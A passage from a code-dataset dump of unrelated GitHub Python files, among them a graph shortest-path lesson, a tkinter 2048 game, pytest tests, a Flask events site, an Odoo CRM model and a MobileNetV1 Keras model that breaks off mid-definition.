self.__repr__()\n\n# Graph with weights\n# graph link https://i.imgur.com/wy7ZHRW.png\nnum_nodes = 9\nedges = [(0, 1, 3), (0, 3, 2), (0, 8, 4), (1, 7, 4), (2, 7, 2), (2, 3, 6), \n (2, 5, 1), (3, 4, 1), (4, 8, 8), (5, 6, 8)]\n\nprint(\"Graph with weights:(node,weight)\")\nnew_graph = DepthGraph(num_nodes, edges, weighted=True)\nprint(new_graph)\n\n# Graph with direction\nnum_nodes = 5\nedges = [(0, 1), (1, 2), (2, 3), (2, 4), (4, 2), (3, 0)]\n\nprint(\"Graph with direction:\")\nnew_graph = DepthGraph(num_nodes, edges, directed=True)\nprint(new_graph)\n\nprint(\"\\n---- search in the Depth graph-----\\n\")\ndef depth_first_search(graph, source):\n visited = [False] * len(graph.data)\n # visited node\n stack = [source]\n result = []\n \n # While the stack list is not empty\n while len(stack) > 0:\n # get the current value from stack by poping the last element LIFO \n current = stack.pop()\n # if not visited then visite the node and add in result\n if not visited[current]:\n result.append(current)\n visited[current] = True\n # now we need to get the value from grap to populate the stack, \n # think this as a push in LIFO\n for v in graph.data[current]:\n stack.append(v)\n \n return result\n# end of depth_first_search()\n\nsource = 4\nresult = depth_first_search(new_graph, source)\nprint(f\"\\nWe can traverse from {source} to these nodes {result}.\")\n\nprint(\"\\n---------------Graph traversal - shortest path--------------\\n\")\ndef shortest_path(graph, source, target):\n visited = [False] * len(graph.data)\n parent = [None] * len(graph.data)\n # this is the distance of the node we have not discovered yet so its infinity\n distance = [float('inf')] * len(graph.data)\n queue = []\n\n distance[source] = 0\n queue.append(source)\n idx = 0\n\n # Here the target is not visited so we can take the current node from \n # the queue as idx. lets mark the current node as visited (True).\n while idx < len(queue) and not visited[target]:\n current = queue[idx]\n visited[current] = True\n idx += 1\n\n # update the distance of all the neighbours\n update_distances(graph, current, distance, parent)\n\n # find the first unvisited node with smallest distance \n next_node = pick_next_node(distance, visited)\n\n if next_node:\n queue.append(next_node)\n \n return distance[target], parent\n\ndef update_distances(graph, current, distance, parent=None):\n \"\"\"Update the distances of the current node's neighbors\"\"\"\n neighbors = graph.data[current] # from (0, 1, 4), (0,1) are the neighbours\n weights = graph.weight[current] # weight of the edge is 4\n for i, node in enumerate(neighbors):\n weight = weights[i]\n # if the length = distance + weight of the current node is less than the next \n # or adjacent node, update the length to distance of node\n if (distance[current] + weight) < distance[node]:\n distance[node] = distance[current] + weight\n if parent:\n parent[node] = current\n\ndef pick_next_node(distance, visited):\n \"\"\"Pick the next univisited node at the smallest distance\"\"\"\n min_distance = float('inf')\n min_node = None\n for node in range(len(distance)):\n # if visited is false and distance of node is less than infinity \n # return the min_node/next_node\n if not visited[node] and distance[node] < min_distance:\n min_node = node\n # update the min_distance to the discovered node\n min_distance = distance[node]\n return min_node\n\n\nnum_nodes = 6\n# node1, node2, weight of edge\n# graph link https://i.imgur.com/Zn5cUkO.png\nedges = [(0, 1, 4), (0, 2, 2), (1, 2, 5), (1, 3, 10), (2, 4, 3), (4, 3, 4), (3, 5, 11)]\nnew_graph = DepthGraph(num_nodes, edges, weighted=True, directed=True)\n\nprint(\"Graph with weight & direction:\")\nprint(\"Data:\",new_graph.data)\nprint(\"Weight:\",new_graph.weight)\nprint(\"Direction:\",new_graph.directed)\nprint()\n\nsource = 0\ntarget = 5\nshorted_path, visited_nodes = shortest_path(new_graph, source, target)\nprint(f\"The shortest path between {source} & {target} is {shorted_path}.\")\nprint(\"Path follwed was:(Node: Parent)\")\nfor i in range(source, target+1):\n print(f\"{i}:{visited_nodes[i]}\")\n","repo_name":"pranayb-konverge/data-structures-and-algorithms-in-python","sub_path":"lesson_5_graphs_exercise.py","file_name":"lesson_5_graphs_exercise.py","file_ext":"py","file_size_in_byte":12441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39284105625","text":"import tkinter as tk\nimport random\nimport colors as c\n\n\nclass Game(tk.Frame):\n _instance = None\n\n def __init__(self, parent, controller):\n if Game._instance is None:\n Game._instance = self\n else:\n raise Exception(\"You cannot create another Game !!!\")\n self.score_undo = []\n self.matrix_undo = []\n tk.Frame.__init__(self, parent)\n self.grid()\n self.master.title('2048')\n\n self.main_grid = tk.Frame(\n self, bg=c.GRID_COLOR, bd=3, width=400, height=400)\n self.main_grid.grid(pady=(90, 20))\n\n button_frame = tk.Frame(self)\n button_frame.place(relx=0.5, y=500, anchor=\"center\")\n button_frame.grid_configure(pady=5)\n\n self.left_button = tk.Button(button_frame, text=\"left\", command=self.left, bg=c.CELL_COLORS[2])\n self.left_button.grid(row=1, column=0)\n self.left_button.grid_configure(padx=10)\n self.left_button.config(height=1, width=5)\n\n self.right_button = tk.Button(button_frame, text=\"right\", command=self.right, bg=c.CELL_COLORS[2])\n self.right_button.grid(row=1, column=4)\n self.right_button.grid_configure(padx=10)\n self.right_button.config(height=1, width=5)\n\n self.up_button = tk.Button(button_frame, text=\"up\", command=self.up, bg=c.CELL_COLORS[2])\n self.up_button.grid(row=0, column=2)\n self.up_button.grid_configure(padx=10)\n self.up_button.config(height=1, width=5)\n\n self.down_button = tk.Button(button_frame, text=\"down\", command=self.down, bg=c.CELL_COLORS[2])\n self.down_button.grid(row=1, column=2)\n self.down_button.grid_configure(padx=10, pady=10)\n self.down_button.config(height=1, width=5)\n\n undo_frame = tk.Frame(self)\n undo_frame.place(x=400, y=50, anchor=\"center\")\n\n self.undo_button = tk.Button(undo_frame, text=\"undo\", command=self.undo, bg=c.CELL_COLORS[2])\n self.undo_button.config(height=1, width=5)\n self.undo_button.grid_configure(padx=10, pady=10)\n\n self.make_GUI()\n self.start_game()\n\n def make_GUI(self):\n # make grid\n self.cells = []\n for i in range(4):\n row = []\n for j in range(4):\n cell_frame = tk.Frame(\n self.main_grid,\n bg=c.EMPTY_CELL_COLOR,\n width=100,\n height=100)\n cell_frame.grid(row=i, column=j, padx=5, pady=5)\n cell_number = tk.Label(self.main_grid, bg=c.EMPTY_CELL_COLOR)\n cell_number.grid(row=i, column=j)\n cell_data = {\"frame\": cell_frame, \"number\": cell_number}\n row.append(cell_data)\n self.cells.append(row)\n\n # make score header\n score_frame = tk.Frame(self)\n score_frame.place(relx=0.5, y=40, anchor=\"center\")\n tk.Label(\n score_frame,\n text=\"Score\",\n font=c.SCORE_LABEL_FONT).grid(\n row=0, column=0)\n self.score_label = tk.Label(score_frame, text=\"0\", font=c.SCORE_FONT)\n self.score_label.grid(row=1)\n\n def start_game(self):\n # create matrix of zeroes\n\n self.matrix = [[0] * 4 for _ in range(4)]\n\n # fill 2 random cells with 2s\n row = random.randint(0, 3)\n col = random.randint(0, 3)\n self.matrix[row][col] = 2\n self.cells[row][col][\"frame\"].configure(bg=c.CELL_COLORS[2])\n self.cells[row][col][\"number\"].configure(\n bg=c.CELL_COLORS[2],\n fg=c.CELL_NUMBER_COLORS[2],\n font=c.CELL_NUMBER_FONTS[2],\n text=\"2\")\n while (self.matrix[row][col] != 0):\n row = random.randint(0, 3)\n col = random.randint(0, 3)\n self.matrix[row][col] = 2\n self.cells[row][col][\"frame\"].configure(bg=c.CELL_COLORS[2])\n self.cells[row][col][\"number\"].configure(\n bg=c.CELL_COLORS[2],\n fg=c.CELL_NUMBER_COLORS[2],\n font=c.CELL_NUMBER_FONTS[2],\n text=\"2\")\n self.score = 0\n self.matrix_undo.append(self.matrix)\n self.score_undo.append(self.score)\n\n # Matrix Manipulation Functions\n\n def stack(self):\n new_matrix = [[0] * 4 for _ in range(4)]\n for i in range(4):\n fill_position = 0\n for j in range(4):\n if self.matrix[i][j] != 0:\n new_matrix[i][fill_position] = self.matrix[i][j]\n fill_position += 1\n self.matrix = new_matrix\n\n def combine(self):\n for i in range(4):\n for j in range(3):\n if self.matrix[i][j] != 0 and self.matrix[i][j] == self.matrix[i][j + 1]:\n self.matrix[i][j] *= 2\n self.matrix[i][j + 1] = 0\n self.score += self.matrix[i][j]\n\n def reverse(self):\n new_matrix = []\n for i in range(4):\n new_matrix.append([])\n for j in range(4):\n new_matrix[i].append(self.matrix[i][3 - j])\n self.matrix = new_matrix\n\n def transpose(self):\n new_matrix = [[0] * 4 for _ in range(4)]\n for i in range(4):\n for j in range(4):\n new_matrix[i][j] = self.matrix[j][i]\n self.matrix = new_matrix\n\n # Add a new 2 or 4 tile randomly to an empty cell\n\n def add_new_tile(self):\n row = random.randint(0, 3)\n col = random.randint(0, 3)\n while (self.matrix[row][col] != 0):\n row = random.randint(0, 3)\n col = random.randint(0, 3)\n self.matrix[row][col] = random.choice([2, 4])\n\n # Update the GUI to match the matrix\n\n def update_GUI(self):\n for i in range(4):\n for j in range(4):\n cell_value = self.matrix[i][j]\n if cell_value == 0:\n self.cells[i][j][\"frame\"].configure(bg=c.EMPTY_CELL_COLOR)\n self.cells[i][j][\"number\"].configure(\n bg=c.EMPTY_CELL_COLOR, text=\"\")\n else:\n self.cells[i][j][\"frame\"].configure(\n bg=c.CELL_COLORS[cell_value])\n self.cells[i][j][\"number\"].configure(\n bg=c.CELL_COLORS[cell_value],\n fg=c.CELL_NUMBER_COLORS[cell_value],\n font=c.CELL_NUMBER_FONTS[cell_value],\n text=str(cell_value))\n self.score_label.configure(text=self.score)\n self.update_idletasks()\n\n # Arrow-Press Functions\n\n def left(self):\n self.matrix_undo.append(self.matrix)\n self.score_undo.append(self.score)\n self.stack()\n self.combine()\n self.stack()\n self.add_new_tile()\n self.update_GUI()\n self.game_over()\n\n def right(self):\n self.matrix_undo.append(self.matrix)\n self.score_undo.append(self.score)\n self.reverse()\n self.stack()\n self.combine()\n self.stack()\n self.reverse()\n self.add_new_tile()\n self.update_GUI()\n self.game_over()\n\n def up(self):\n self.matrix_undo.append(self.matrix)\n self.score_undo.append(self.score)\n self.transpose()\n self.stack()\n self.combine()\n self.stack()\n self.transpose()\n self.add_new_tile()\n self.update_GUI()\n self.game_over()\n\n def down(self):\n self.matrix_undo.append(self.matrix)\n self.score_undo.append(self.score)\n self.transpose()\n self.reverse()\n self.stack()\n self.combine()\n self.stack()\n self.reverse()\n self.transpose()\n self.add_new_tile()\n self.update_GUI()\n self.game_over()\n\n def undo(self):\n if len(self.matrix_undo) > 1:\n self.score = self.score_undo.pop()\n self.matrix = self.matrix_undo.pop()\n self.update_GUI()\n self.game_over()\n\n # Check if any moves are possible\n\n def horizontal_move_exists(self):\n for i in range(4):\n for j in range(3):\n if self.matrix[i][j] == self.matrix[i][j + 1]:\n return True\n return False\n\n def vertical_move_exists(self):\n for i in range(3):\n for j in range(4):\n if self.matrix[i][j] == self.matrix[i + 1][j]:\n return True\n return False\n\n # Check if Game is Over (Win/Lose)\n\n def game_over(self):\n if any(2048 in row for row in self.matrix):\n game_over_frame = tk.Frame(self.main_grid, borderwidth=2)\n game_over_frame.place(relx=0.5, rely=0.5, anchor=\"center\")\n tk.Label(\n game_over_frame,\n text=\"You win!\",\n bg=c.WINNER_BG,\n fg=c.GAME_OVER_FONT_COLOR,\n font=c.GAME_OVER_FONT).pack()\n elif not any(0 in row for row in\n self.matrix) and not self.horizontal_move_exists() and not self.vertical_move_exists():\n game_over_frame = tk.Frame(self.main_grid, borderwidth=2)\n game_over_frame.place(relx=0.5, rely=0.5, anchor=\"center\")\n tk.Label(\n game_over_frame,\n text=\"Game over!\",\n bg=c.LOSER_BG,\n fg=c.GAME_OVER_FONT_COLOR,\n font=c.GAME_OVER_FONT).pack()\n","repo_name":"AvivHitman/2048","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":9459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"69853745852","text":"from battle_city.monsters.monster import Monster\nfrom battle_city.basic import Direction\n\nimport pytest\n\ndef make_monster(x=128, y=128):\n return Monster(x, y)\n\n\ndef test_set_position():\n monster = make_monster()\n monster.set_position(32, 32)\n\n assert monster.position.x == 32\n assert monster.position.y == 32\n\n\ndef test_set_old_position():\n monster = make_monster()\n monster.set_position(32, 32)\n monster.set_old_position()\n\n assert monster.old_position.x == 32\n assert monster.old_position.y == 32\n\n\ndef test_set_speed():\n monster = make_monster()\n monster.set_speed(10)\n assert monster.speed == 10\n\n\ndef test_set_direction():\n monster = make_monster()\n monster.set_direction(Direction.UP)\n\n assert monster.direction == Direction.UP\n\n\ndef test_get_type():\n monster = make_monster()\n\n assert monster.get_type() == 'monster'\n\n\n@pytest.mark.parametrize('direction, dx, dy', [\n (Direction.UP, 0, -10),\n (Direction.DOWN, 0, 10),\n (Direction.LEFT, -10, 0),\n (Direction.RIGHT, 10, 0),\n])\ndef test_move_with_speed_up(direction, dx, dy):\n monster = make_monster(x=128, y=128)\n monster.set_direction(direction)\n monster.move_with_speed(10)\n\n assert monster.position.x == 128 + dx\n assert monster.position.y == 128 + dy\n\n\ndef move_if_is_freeze():\n monster = make_monster(x=128, y=128)\n monster.set_direction(Direction.UP)\n monster.set_freeze()\n monster.move()\n\n assert monster.position.x == 128\n assert monster.position.y == 128\n\n\ndef move_if_is_not_freeze():\n monster = make_monster(x=128, y=128)\n monster.set_speed(10)\n monster.set_direction(Direction.UP)\n monster.move()\n\n assert monster.position.x == 128\n assert monster.position.y == 118\n","repo_name":"firemark/battle-city-ai","sub_path":"tests/monsters/test_monster.py","file_name":"test_monster.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"78"} +{"seq_id":"7638900021","text":"import sys\nimport math\n\ndef ord(n):\n n = int(n)\n if 11 <= (n % 100) <= 13:\n suffix = 'th'\n else:\n suffix = ['th', 'st', 'nd', 'rd', 'th'][min(n % 10, 4)]\n return str(n) + suffix\n\nprint(ord(int(input())))\n\n# 1 --> 1st // 2---> 2nd\n","repo_name":"MarouaneBouf/CodeClashes","sub_path":"OrdinalNumber.py","file_name":"OrdinalNumber.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28783744556","text":"from flask import Flask\r\nfrom flask import render_template\r\nimport contentscrape\r\nfrom contentscrape import dt, start, end\r\nfrom datetime import datetime, timedelta, date\r\n\r\napp = Flask(__name__,\r\n template_folder=\"templates\",\r\n static_folder=\"static\")\r\n\r\nevents = {\r\n \"Gaillard\": contentscrape.Gaillard(),\r\n \"Home Team Downtown\": contentscrape.HomeTeamDowntown(),\r\n \"Home Team West Ashley\": contentscrape.HomeTeamWA(),\r\n \"Music Farm Charleston\": contentscrape.MusicFarm(),\r\n \"Music Hall\": contentscrape.MusicHall(),\r\n \"Pour House\": contentscrape.PourHouse(),\r\n \"Royal American\": contentscrape.RoyalAmerican(),\r\n \"Sparrow\": contentscrape.Sparrow(),\r\n \"Theatre 99\": contentscrape.Theatre99(),\r\n \"Tin Roof\": contentscrape.TinRoof(),\r\n \"Wind Jammer\": contentscrape.WindJammer(),\r\n \"Woolfe Street\": contentscrape.WoolfeStreet()\r\n }\r\n\r\n# Get today's date\r\ndate_today = date.today().strftime(\"%A, %B %#d, %Y\")\r\n# Get list of days of the week\r\ndates = [dt.strftime(\"%A, %B %#d, %Y\") for dt in contentscrape.daterange(start, end)]\r\n\r\n\r\n@app.route('/', methods=['GET'])\r\n@app.route('/home', methods=['GET'])\r\ndef hello_world():\r\n return render_template('home.html', date_today=date_today,\r\n date_week=dates[0] + \" - \" + dates[-1],\r\n results=events, page='Home')\r\n\r\n\r\n@app.route('/about', methods=['GET'])\r\ndef about():\r\n return render_template('about.html', venues=contentscrape.venuesAbout, page='About')\r\n\r\n\r\n@app.route('/contact', methods=['GET'])\r\ndef contact():\r\n return render_template('contact.html', page='Contact')\r\n\r\n\r\napp.config['TEMPLATES_AUTO_RELOAD'] = True\r\n# app.config['TESTING'] = True\r\n\r\nif __name__ == '__main__':\r\n app.run(host='127.0.0.1', port=5000)\r\n","repo_name":"rybli/chs-tonight-2.0","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72979588412","text":"import sys\nimport os\nimport pandas as pd\nimport numpy as np\nfrom itertools import chain\n\n\nsys.path.append('../src')\nsys.path.append('../tests')\nimport data_helper\n\n\nclass TestAmazonKerasClassifier:\n \"\"\"\n Use with pytest -q -s amazon_keras_classifier_tests.py\n Checks that the preprocessed data have the right shape\n \"\"\"\n def test_data_preprocess(self):\n img_resize = (16, 16)\n color_channels = 3 # RGB\n train_jpeg_dir, test_jpeg_dir, test_jpeg_additional, train_csv_file = data_helper.get_jpeg_data_files_paths()\n\n assert os.path.exists(train_jpeg_dir), \"The {} folder does not exist\".format(train_jpeg_dir)\n assert os.path.exists(test_jpeg_dir), \"The {} folder does not exist\".format(test_jpeg_dir)\n assert os.path.exists(test_jpeg_additional), \"The {} file does not exist\".format(test_jpeg_additional)\n assert os.path.exists(train_csv_file), \"The {} file does not exist\".format(train_csv_file)\n\n x_train, y_train, y_map = data_helper.preprocess_train_data(train_jpeg_dir, train_csv_file,\n img_resize=img_resize)\n\n x_test, _ = data_helper.preprocess_test_data(test_jpeg_dir, img_resize=img_resize)\n x_test_add, _ = data_helper.preprocess_test_data(test_jpeg_additional, img_resize=img_resize)\n\n labels_df = pd.read_csv(train_csv_file)\n labels_count = len(set(chain.from_iterable([tags.split(\" \") for tags in labels_df['tags'].values])))\n train_files_count = len(os.listdir(train_jpeg_dir))\n test_files_count = len(os.listdir(test_jpeg_dir))\n test_add_file_count = len(os.listdir(test_jpeg_additional))\n assert x_train.shape == (train_files_count, *img_resize, color_channels)\n assert x_test.shape == (test_files_count, *img_resize, color_channels)\n assert x_test_add.shape == (test_add_file_count, *img_resize, color_channels)\n assert y_train.shape == (train_files_count, labels_count)\n","repo_name":"EKami/planet-amazon-deforestation","sub_path":"tests/amazon_keras_classifier_tests.py","file_name":"amazon_keras_classifier_tests.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"78"} +{"seq_id":"74600257532","text":"import numpy as np\nimport math, sys, random\n\ndef inner_x_w(x, num_vars, bit_eqns, gamma):\n total_phase = 1 # skip the 1/sqrt(2^n), we cancel it later\n # for each equation, calculate overlap\n for i in range(len(bit_eqns)):\n total_phase *= math.e**(-complex(0,1)*gamma*0.5*((-1)**(bit_eqns[i][1] + num_ones(x & bit_eqns[i][0]))))\n return total_phase\n\ndef convert_to_bin(num_vars, eqn_set):\n n = num_vars - 1\n bit_eqns = []\n for eqn in eqn_set:\n y = 0\n for j in range(3):\n y += 2**(n - eqn[j])\n bit_eqns.append([y, eqn[3]])\n return bit_eqns\n\ndef num_ones(n):\n count = 0\n while (n):\n count += n & 1\n n >>= 1\n return count\n\ndef e3lin2_exact(i, eqns_location, gamma):\n all_eqns = []\n f = open(eqns_location, \"r\")\n line = f.readline()\n while line:\n all_eqns.append(list(map(int, line.split(\",\"))))\n line = f.readline()\n\n base_eqn = all_eqns[i]\n qubits = set()\n for j in range(len(all_eqns)):\n qubits |= set(all_eqns[j][:-1])\n num_vars = len(qubits)\n bit_eqns = convert_to_bin(num_vars, all_eqns)\n ys = bit_eqns[i][0]\n\n total = 0\n done_samples = 0\n # 10**5 samples = 33 seconds\n # num_samples = (10**5) * len(all_eqns)**2\n # num_samples = 5.4 * 10**7 # takes 5 hours\n num_samples = 6*10**6\n while done_samples < num_samples:\n done_samples += 1\n if done_samples % 10**4 == 0:\n print(done_samples)\n sys.stdout.flush()\n x = random.randint(0, 2**(num_vars)-1)\n alpha = -complex(0,1)*((-1)**(num_ones(x & ys)))\n row_index = x ^ ys\n inner1 = np.conj(inner_x_w(row_index, num_vars, bit_eqns, gamma))\n inner2 = inner_x_w(x, num_vars, bit_eqns, gamma)\n total += inner1*inner2*alpha\n total /= num_samples\n\n '''\n # exact calculation, sum over basis states instead of sampling\n total = 0\n for i in range(2**num_vars):\n alpha = -complex(0,1)*((-1)**(num_ones(i & ys)))\n row_index = i ^ ys\n inner1 = np.conj(inner_x_w(row_index, num_vars, bit_eqns, gamma))\n inner2 = inner_x_w(i, num_vars, bit_eqns, gamma)\n total += 2**num_vars*inner1*inner2*alpha\n\n total /= 2**num_vars\n #total *= (-1)**base_eqn[3] why don't we need this?\n '''\n\n # error calculation\n delta = 0.001\n eps = math.sqrt(2*math.log(2/delta)/num_samples)\n error = eps*len(all_eqns)/2\n\n return np.real(total), error\n\nif __name__ == '__main__':\n if(len(sys.argv) != 4):\n print('Please specify , , ')\n else:\n eqn_number = int(sys.argv[1])\n eqns_location = sys.argv[2]\n gamma = float(sys.argv[3])\n\n estimate, error = e3lin2_exact(eqn_number, eqns_location, gamma)\n print(float(estimate))\n print(error)\n","repo_name":"cook-jeremy/paulishuffle-e3lin2","sub_path":"exact.py","file_name":"exact.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"75073344571","text":"import pandas as pd\r\n\r\ndataset = pd.read_csv('Female_Stats.csv')\r\n\r\nfeatures = dataset.iloc[:,1:]\r\nlabels = dataset.iloc[:,0]\r\n\r\nimport statsmodels.api as sm\r\nfeatures = sm.add_constant(features)\r\n\r\nfeatures_opt = features[:]\r\nregressor_OLS = sm.OLS(endog = labels, exog = features_opt).fit()\r\nregressor_OLS.summary()\r\n\r\n#print(regressor_OLS.params[1])\r\n#print(regressor_OLS.params[2])\r\n\r\nx = labels[0].mean()\r\n\r\n#for inc in mother's height\r\n\r\nfeatures_opt = features.momheight + 1\r\nfeatures_opt = features_opt.to_frame()\r\n\r\n# Fitting Linear Regression to the dataset\r\nfrom sklearn.linear_model import LinearRegression\r\nlin_reg_1 = LinearRegression()\r\nlin_reg_1.fit(features_opt, labels)\r\n\r\nlst1=[]\r\nfor item in labels:\r\n y = lin_reg_1.predict(item)\r\n lst1.append(y)\r\n \r\ndf = pd.DataFrame(lst1)\r\nz=df[0].mean()\r\ndiff = z-x\r\nprint(\"For Mom height inc by 1 : \" + str(diff))\r\n\r\n#for inc in Father's height\r\n\r\nfeatures_opt = features.dadheight + 1\r\nfeatures_opt = features_opt.to_frame()\r\n\r\n# Fitting Linear Regression to the dataset\r\nfrom sklearn.linear_model import LinearRegression\r\nlin_reg_1 = LinearRegression()\r\nlin_reg_1.fit(features_opt, labels)\r\n\r\nlst1=[]\r\nfor item in labels:\r\n y = lin_reg_1.predict(item)\r\n lst1.append(y)\r\n \r\ndf = pd.DataFrame(lst1)\r\nz=df[0].mean()\r\ndiff = z-x\r\nprint(\"For Dad height inc by 1 : \" + str(diff))\r\n","repo_name":"anubhavsrivastava10/Python-ML","sub_path":"DAY 17/Female_Stats.py","file_name":"Female_Stats.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42158139412","text":"from dateutil.relativedelta import relativedelta\n\nfrom odoo import api, fields, models, _\nfrom odoo.tools.safe_eval import safe_eval\nfrom odoo.exceptions import ValidationError\n\n\nclass CrmTeam(models.Model):\n _inherit = 'crm.team'\n _description = 'Sales Team'\n\n\n correos = fields.Char( string='Correos' )\n miembros = fields.Many2many('res.users', string='Miembros del Equipo' )\n surcursal_id = fields.Many2one('surcursal', string='Surcursal')\n\n rol = fields.Selection([('comercial', 'Comercial'), \n ('delegado', 'Delegado'),('postventa','Post-Venta')\n ],string='Rol', default='comercial') \n\n \n @api.model\n @api.returns('self', lambda value: value.id if value else False)\n def _get_default_team_id(self, user_id=None, domain=None):\n if not user_id:\n user_id = self.env.uid\n team_id = self.env['crm.team'].search([\n '|', ('user_id', '=', user_id), ('miembros', '=', user_id),\n '|', ('company_id', '=', False), ('company_id', '=', self.env.company.id)\n ], limit=1)\n if not team_id and 'default_team_id' in self.env.context:\n team_id = self.env['crm.team'].browse(self.env.context.get('default_team_id'))\n if not team_id:\n team_domain = domain or []\n default_team_id = self.env['crm.team'].search(team_domain, limit=1)\n return default_team_id or self.env['crm.team']\n return team_id\n\n\n\n @api.onchange(\"miembros\")\n def actualizar_correos_team(self,):\n correos=self.miembros.mapped('email')\n correoCadena=\"\"\n for correo in correos:\n if correo:\n correoCadena=correoCadena+correo+','\n correoCadena=correoCadena.strip(',')\n self.correos=correoCadena\n\n\n\n @api.model\n def create(self, values):\n team = super(CrmTeam, self.with_context(mail_create_nosubscribe=True)).create(values)\n if values.get('miembros'):\n team._add_members_to_favorites()\n return team\n\n def write(self, values):\n res = super(CrmTeam, self).write(values)\n if values.get('miembros'):\n self._add_members_to_favorites()\n return res\n\n def unlink(self):\n default_teams = [\n self.env.ref('sales_team.salesteam_website_sales'),\n self.env.ref('sales_team.pos_sales_team'),\n self.env.ref('sales_team.ebay_sales_team')\n ]\n for team in self:\n if team in default_teams:\n raise UserError(_('Cannot delete default team \"%s\"' % (team.name)))\n return super(CrmTeam,self).unlink()\n\n def _add_members_to_favorites(self):\n for team in self:\n team.favorite_user_ids = [(4, member.id) for member in team.miembros]\n","repo_name":"aigiler/promoautoecuador","sub_path":"gzl_crm/models/crm_team.py","file_name":"crm_team.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70216747774","text":"#-*- coding: UTF-8 -*-\r\n# based on tensorflow==1.2.0 keras==2.0.6\r\n# Also install h5py, opencv-python\r\nimport os\r\n# Run on CPU\r\n# os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"-1\"\r\n'''ZZH 2022.04.20\r\n 1.将网络结构修改为mobilenetv1'''\r\n'''ZZH 2022.04.28\r\n 将网络模型进行剪枝,减少参数量,成功\r\n 总参数大约12000,卷积层参数减小至原先1/5\r\n 结合之前CNN网络进行修改'''\r\n'''ZZH 2022.04.28\r\n 尝试用卷积层代替全连接层,减小参数至4958'''\r\n\r\n\r\n\r\nimport tensorflow as tf\r\nimport keras\r\nfrom keras import layers\r\nimport matplotlib.pyplot as plt\r\nfrom keras.models import Model, Sequential\r\nfrom keras.layers import Input, Dense, Activation, Flatten\r\nfrom keras.callbacks import ModelCheckpoint\r\nfrom keras import optimizers\r\nimport numpy as np\r\nimport cv2\r\nimport random\r\n# from sklearn.metrics import roc_curve, auc\r\n\r\n# Solve \"Function call stack:train_function\"\r\n# tf.compat.v1.disable_eager_execution()\r\n\r\n# 动态分配GPU资源\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\nconfig = tf.compat.v1.ConfigProto()\r\nconfig.gpu_options.allow_growth = True\r\nsession = tf.compat.v1.InteractiveSession(config=config)\r\n\r\n\r\nBATCH_SIZE = 64\r\nepochs = 8\r\nImage_resize = (99, 99)\r\nInput_shape = (99, 99, 3) #要求输入的大小 \r\nDropoutrate = 0.5\r\n\r\n\r\n\r\n'''def conv_block(input_tensor, filters, alpha, kernel_size=(9,9), strides=(1,1)):\r\n \r\n # 超参数alpha控制卷积核个数\r\n filters = int(filters*alpha)\r\n \r\n # 卷积+批标准化+激活函数\r\n x = layers.Conv2D(filters, kernel_size, \r\n strides=strides, # 步长\r\n padding='same', # 0填充,卷积后特征图size不变\r\n use_bias=False)(input_tensor) # 有BN层就不需要计算偏置\r\n \r\n x = layers.BatchNormalization()(x) # 批标准化\r\n \r\n #x = layers.Activation(\"relu\")(x) # relu6激活函数\r\n x = layers.Activation('relu')(x)\r\n \r\n return x # 返回一次标准卷积后的结果'''\r\n \r\n#(2)深度可分离卷积块\r\ndef depthwise_conv_block(input_tensor, point_filters,alpha, depth_multiplier,kernel_size=(3,3), strides=(1,1)):\r\n \r\n # 超参数alpha控制逐点卷积的卷积核个数\r\n point_filters = int(point_filters*alpha)\r\n \r\n # ① 深度卷积--输出特征图个数和输入特征图的通道数相同\r\n x = layers.DepthwiseConv2D(kernel_size=kernel_size, # 卷积核size\r\n strides=strides, # 步长\r\n padding='same', # strides=1时,卷积过程中特征图size不变\r\n depth_multiplier=depth_multiplier, # 超参数,控制卷积层中间输出特征图的长宽\r\n use_bias=False)(input_tensor) # 有BN层就不需要偏置\r\n \r\n x = layers.BatchNormalization()(x) # 批标准化\r\n \r\n x = layers.Activation('relu')(x) # relu6激活函数\r\n \r\n # ② 逐点卷积--1*1标准卷积\r\n x = layers.Conv2D(point_filters, kernel_size=(1,1), # 卷积核默认1*1\r\n padding='same', # 卷积过程中特征图size不变\r\n strides=(1,1), # 步长为1,对特征图上每个像素点卷积\r\n use_bias=False)(x) # 有BN层,不需要偏置\r\n \r\n x = layers.BatchNormalization()(x) # 批标准化\r\n \r\n x = layers.Activation('relu')(x) # 激活函数\r\n \r\n return x # 返回深度可分离卷积结果\r\n\r\n\r\n\r\n\r\n'''zm change 2021.4.26 模型结构化简版'''\r\n# V3.0 try AlexNet\r\ndef make_model_MobileNetV1(classes, input_shape, alpha, depth_multiplier, dropout_rate):\r\n inputs = Input(shape=input_shape)\r\n #inputs = np.expand_dims(inputs, axis=3)\r\n\r\n #Parameter meaning: number of convolutional kernels, convolutional kernel size, step size and padding mode, \r\n #same means padding with 0 for edges, valid means no padding\r\n x = depthwise_conv_block(inputs,32, alpha, depth_multiplier,kernel_size=(8,8), strides=(2,2))#50*50*32\r\n x = layers.MaxPooling2D(pool_size=(3,3),strides=(2,2))(x)#24*24*32\r\n x = layers.Dropout(rate=Dropoutrate)(x)\r\n\r\n x = depthwise_conv_block(x,16, alpha, depth_multiplier,kernel_size=(5,5), strides=(1,1))#24*24*16\r\n x = layers.MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(x)#11*11*16\r\n x = layers.Dropout(rate=Dropoutrate)(x)\r\n\r\n '''x = 